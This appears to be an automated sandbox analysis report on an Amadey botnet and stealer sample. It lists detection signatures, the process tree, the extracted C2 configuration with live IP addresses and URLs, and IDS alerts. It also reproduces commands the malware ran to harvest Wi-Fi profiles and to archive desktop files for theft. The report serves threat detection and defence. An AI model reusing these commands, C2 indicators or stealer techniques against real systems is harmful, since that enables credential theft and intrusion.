Edit tour

Windows Analysis Report
tOuVwTJrau.exe

Overview

General Information

Sample name:	tOuVwTJrau.exe renamed because original name is a hash value
Original sample name:	4962575a2378d5c72e7a836ea766e2ad.exe
Analysis ID:	1574259
MD5:	4962575a2378d5c72e7a836ea766e2ad
SHA1:	549964178b12017622d3cbdda6dbfdef0904e7e2
SHA256:	eff5fad47b9c739b09e760813b2bcbb0788eb35598f72e64ff95c794e72e6676
Tags:	Amadeyexeuser-abuse_ch
Infos:

Detection

Amadey

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Amadeys Clipper DLL

Yara detected Amadeys stealer DLL

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Contains functionality to start a terminal service

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Suspicious Script Execution From Temp Folder

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Instant Messenger accounts or passwords

Uses netsh to modify the Windows network and firewall settings

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

tOuVwTJrau.exe (PID: 6808 cmdline: "C:\Users\user\Desktop\tOuVwTJrau.exe" MD5: 4962575A2378D5C72E7A836EA766E2AD)

Gxtuum.exe (PID: 6968 cmdline: "C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe" MD5: 4962575A2378D5C72E7A836EA766E2AD)

rundll32.exe (PID: 5004 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 1220 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main MD5: EF3179D498793BF4234F708D3BE28633)

netsh.exe (PID: 4888 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

conhost.exe (PID: 5856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6944 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rundll32.exe (PID: 3940 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 3272 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main MD5: EF3179D498793BF4234F708D3BE28633)

netsh.exe (PID: 5460 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

conhost.exe (PID: 5724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6896 cmdline: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rundll32.exe (PID: 6828 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 888 cmdline: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main MD5: 889B99C52A60DD49227C5E485A016679)

Gxtuum.exe (PID: 7052 cmdline: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe MD5: 4962575A2378D5C72E7A836EA766E2AD)

Gxtuum.exe (PID: 6796 cmdline: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe MD5: 4962575A2378D5C72E7A836EA766E2AD)

Gxtuum.exe (PID: 2360 cmdline: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe MD5: 4962575A2378D5C72E7A836EA766E2AD)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": "185.81.68.148/8Fvu5jh4DbS/index.php", "Version": "5.10", "Install Folder": "ee29ea508b", "Install File": "Gxtuum.exe"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
tOuVwTJrau.exe	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Unpacked PEs

Source	Rule	Description	Author
12.2.rundll32.exe.6c050000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
16.2.rundll32.exe.6c050000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
20.2.Gxtuum.exe.e0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
2.2.Gxtuum.exe.e0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
22.2.Gxtuum.exe.e0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
1.0.Gxtuum.exe.e0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
0.2.tOuVwTJrau.exe.2e0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
0.0.tOuVwTJrau.exe.2e0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
20.0.Gxtuum.exe.e0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
1.2.Gxtuum.exe.e0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
22.0.Gxtuum.exe.e0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
2.0.Gxtuum.exe.e0000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
Click to see the 7 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 1220, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 6944, ProcessName: powershell.exe

Sigma detected: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 1220, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 6944, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 1220, ParentProcessName: rundll32.exe, ProcessCommandLine: powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal, ProcessId: 6944, ProcessName: powershell.exe

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: netsh wlan show profiles, CommandLine: netsh wlan show profiles, CommandLine|base64offset|contains: l, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 1220, ParentProcessName: rundll32.exe, ProcessCommandLine: netsh wlan show profiles, ProcessId: 4888, ProcessName: netsh.exe

Suricata Signatures

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T07:47:05.831787+0100	2856147	1	A Network Trojan was detected	192.168.2.4	49736	185.81.68.147	80	TCP

ETPRO MALWARE Amadey CnC Activity M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T07:47:08.802544+0100	2856148	1	A Network Trojan was detected	192.168.2.4	49739	185.81.68.148	80	TCP
2024-12-13T07:47:14.878635+0100	2856148	1	A Network Trojan was detected	192.168.2.4	49750	185.81.68.148	80	TCP
2024-12-13T07:47:21.332803+0100	2856148	1	A Network Trojan was detected	192.168.2.4	49757	185.81.68.148	80	TCP
2024-12-13T07:47:27.441914+0100	2856148	1	A Network Trojan was detected	192.168.2.4	49762	185.81.68.148	80	TCP
2024-12-13T07:47:33.552445+0100	2856148	1	A Network Trojan was detected	192.168.2.4	49766	185.81.68.148	80	TCP
2024-12-13T07:47:39.660962+0100	2856148	1	A Network Trojan was detected	192.168.2.4	49770	185.81.68.148	80	TCP
2024-12-13T07:47:45.832857+0100	2856148	1	A Network Trojan was detected	192.168.2.4	49774	185.81.68.148	80	TCP
2024-12-13T07:47:51.971087+0100	2856148	1	A Network Trojan was detected	192.168.2.4	49782	185.81.68.148	80	TCP
2024-12-13T07:47:58.126332+0100	2856148	1	A Network Trojan was detected	192.168.2.4	49786	185.81.68.148	80	TCP
2024-12-13T07:48:04.221930+0100	2856148	1	A Network Trojan was detected	192.168.2.4	49792	185.81.68.148	80	TCP
2024-12-13T07:48:10.290034+0100	2856148	1	A Network Trojan was detected	192.168.2.4	49811	185.81.68.148	80	TCP
2024-12-13T07:48:16.362981+0100	2856148	1	A Network Trojan was detected	192.168.2.4	49830	185.81.68.148	80	TCP
2024-12-13T07:48:22.439634+0100	2856148	1	A Network Trojan was detected	192.168.2.4	49846	185.81.68.148	80	TCP
2024-12-13T07:48:28.519011+0100	2856148	1	A Network Trojan was detected	192.168.2.4	49863	185.81.68.148	80	TCP
2024-12-13T07:48:34.644011+0100	2856148	1	A Network Trojan was detected	192.168.2.4	49882	185.81.68.148	80	TCP
2024-12-13T07:48:40.970501+0100	2856148	1	A Network Trojan was detected	192.168.2.4	49900	185.81.68.148	80	TCP
2024-12-13T07:48:47.051052+0100	2856148	1	A Network Trojan was detected	192.168.2.4	49920	185.81.68.148	80	TCP
2024-12-13T07:48:53.239614+0100	2856148	1	A Network Trojan was detected	192.168.2.4	49938	185.81.68.148	80	TCP
2024-12-13T07:48:59.678631+0100	2856148	1	A Network Trojan was detected	192.168.2.4	49953	185.81.68.148	80	TCP
2024-12-13T07:49:05.786107+0100	2856148	1	A Network Trojan was detected	192.168.2.4	49970	185.81.68.148	80	TCP

ETPRO MALWARE Amadey CnC Activity M6

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T07:47:11.952254+0100	2856150	1	A Network Trojan was detected	192.168.2.4	49746	185.81.68.148	80	TCP
2024-12-13T07:47:11.973837+0100	2856150	1	A Network Trojan was detected	192.168.2.4	49747	185.81.68.148	80	TCP

ETPRO MALWARE Amadey CnC Activity M7

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T07:47:15.970253+0100	2856151	1	A Network Trojan was detected	192.168.2.4	49752	185.81.68.148	80	TCP
2024-12-13T07:47:16.063977+0100	2856151	1	A Network Trojan was detected	192.168.2.4	49753	185.81.68.148	80	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T07:47:05.846458+0100	2803305	3	Unknown Traffic	192.168.2.4	49738	185.81.68.147	80	TCP
2024-12-13T07:47:11.583266+0100	2803305	3	Unknown Traffic	192.168.2.4	49743	185.81.68.147	80	TCP

ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T07:47:10.493418+0100	2855239	1	A Network Trojan was detected	192.168.2.4	49741	185.81.68.147	80	TCP
2024-12-13T07:47:10.515862+0100	2855239	1	A Network Trojan was detected	192.168.2.4	49742	185.81.68.147	80	TCP
2024-12-13T07:47:11.952254+0100	2855239	1	A Network Trojan was detected	192.168.2.4	49746	185.81.68.148	80	TCP
2024-12-13T07:47:11.973837+0100	2855239	1	A Network Trojan was detected	192.168.2.4	49747	185.81.68.148	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1t	Avira URL Cloud: Label: malware
Source: http://185.81.68.147/7vhfjke3/index.php?wal=1ies.	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.php&	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/7vhfjke3/index.php&	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/7vhfjke3/index.php$	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/X	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1h	Avira URL Cloud: Label: malware
Source: http://185.81.68.148/8Fvu5jh4DbS/index.php0	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpd7	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1	Avira URL Cloud: Label: malware
Source: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1z	Avira URL Cloud: Label: malware
Source: http://185.81.68.147/7vhfjke3/index.php1	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpvhfjke3/index.php	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/7vhfjke3/index.php6	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/wsys	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/7vhfjke3/index.php8	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/SysWOW64	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/ows	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/7vhfjke3/Plugins/cred64.dll	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpoded	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.phps	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpv	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.php	Avira URL Cloud: Label: malware
Source: http://185.81.68.147/7vhfjke3/index.php?wal=1H;0	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/7vhfjke3/index.phpz#29	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.php98	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpb	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/7vhfjke3/index.phpa	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.phph	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpf	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpg	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpXx/M	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpn	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpm	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpR	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/7vhfjke3/index.phpo	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/7vhfjke3/index.phps	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/7vhfjke3/index.phpu	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1rnN	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/7vhfjke3/index.phpw	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpZ	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/ta;	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1eB	Avira URL Cloud: Label: malware
Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpndows	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/7vhfjke3/index.phpE	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpL	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/7vhfjke3/index.php?wal=1tesH	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpK	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpJ	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/Fvu5jh4DbS/index.php	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/7vhfjke3/index.php?wal=1urn	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/7vhfjke3/index.php?wal=1	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.php?wal=1b	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/7vhfjke3/index.phpbf198	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpbbf198	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.php?R	Avira URL Cloud: Label: malware
Source: http://185.81.68.147/7vhfjke3/index.php?wal=1f	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/7vhfjke3/index.php	Avira URL Cloud: Label: malware
Source: http://185.81.68.148/8Fvu5jh4DbS/index.php:	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/7vhfjke3/Plugins/clip64.dll	Avira URL Cloud: Label: phishing
Source: http://185.81.68.147/7vhfjke3/index.phpX	Avira URL Cloud: Label: phishing
Source: http://185.81.68.148/8Fvu5jh4DbS/index.phpded	Avira URL Cloud: Label: phishing

Found malware configuration

Source: tOuVwTJrau.exe

Malware Configuration Extractor: Amadey {"C2 url": "185.81.68.148/8Fvu5jh4DbS/index.php", "Version": "5.10", "Install Folder": "ee29ea508b", "Install File": "Gxtuum.exe"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll	ReversingLabs: Detection: 34%

Multi AV Scanner detection for submitted file

Source: tOuVwTJrau.exe	Virustotal: Detection: 70%			Perma Link
Source: tOuVwTJrau.exe	ReversingLabs: Detection: 65%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: tOuVwTJrau.exe

Joe Sandbox ML: detected

Source: tOuVwTJrau.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: tOuVwTJrau.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 0000000B.00000002.2085742458.0000018FEDA2F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: softy.pdb source: powershell.exe, 0000000B.00000002.2086071669.0000018FEDA37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 0000000B.00000002.2086071669.0000018FEDA37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Target.pdbn: source: powershell.exe, 0000000B.00000002.2086521310.0000018FEDA77000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.2084376768.0000018FED9C5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32A56-E329-4D4D1%0# source: powershell.exe, 0000000B.00000002.2086521310.0000018FEDA5D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\Mktmp\StealerDLL\x64\Release\STEALERDLL.pdb source: cred64.dll.1.dr, cred64[1].dll.1.dr

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_6C05BD9F FindFirstFileExW,_free,FindNextFileW,_free,FindClose,_free,

12_2_6C05BD9F

Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\OneDrive\desktop.ini	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\Videos\desktop.ini	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\Music\desktop.ini	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49736 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49739 -> 185.81.68.148:80
Source: Network traffic	Suricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.4:49741 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.4:49742 -> 185.81.68.147:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49750 -> 185.81.68.148:80
Source: Network traffic	Suricata IDS: 2856151 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M7 : 192.168.2.4:49753 -> 185.81.68.148:80
Source: Network traffic	Suricata IDS: 2855239 - Severity 1 - ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST) : 192.168.2.4:49746 -> 185.81.68.148:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:49766 -> 185.81.68.148:80
